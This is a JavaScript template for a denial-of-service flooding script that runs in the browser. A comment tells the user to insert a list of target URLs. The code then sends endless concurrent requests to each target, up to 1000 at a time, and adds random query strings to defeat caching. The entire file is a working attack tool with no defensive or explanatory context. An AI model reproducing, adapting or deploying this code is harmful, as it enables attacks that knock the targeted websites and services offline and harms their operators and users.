// NOTE: this is template, should replace "INJECT_LIST_OF_URLS_HERE"
//  with comma separated and ` joined array list, content should't contain "`"
//  example: [1,2,3,4].join('`,`') ==> 1`,`2`,`3`,`4
//
((targets) => {
  const CONCURRENCY_LIMIT = 1000;

  let queue = [];

  async function fetchWithTimeout(resource, options) {
    const controller = new AbortController();
    const id = setTimeout(() => controller.abort(), options.timeout);
    return fetch(resource, {
      signal: controller.signal
    }).then((response) => {
      clearTimeout(id);
      return response;
    }).catch((error) => {
      clearTimeout(id);
      throw error;
    });
  }

  async function flood(target) {
    for (var i = 0; ; ++i) {
      if (queue.length > CONCURRENCY_LIMIT) {
        await queue.shift()
      }
      let rand = i % 13 === 0 ? '' : ('?' + Math.floor(Math.random() * 1000))
      queue.push(
        fetchWithTimeout(target + rand, { timeout: 1000 })
          .catch((error) => {
            if (error.code === 20 /* ABORT */) {
              return;
            }
          })
      )
    }
  }

  targets.map(flood);

})([`<INJECT_LIST_OF_URLS_HERE>`]);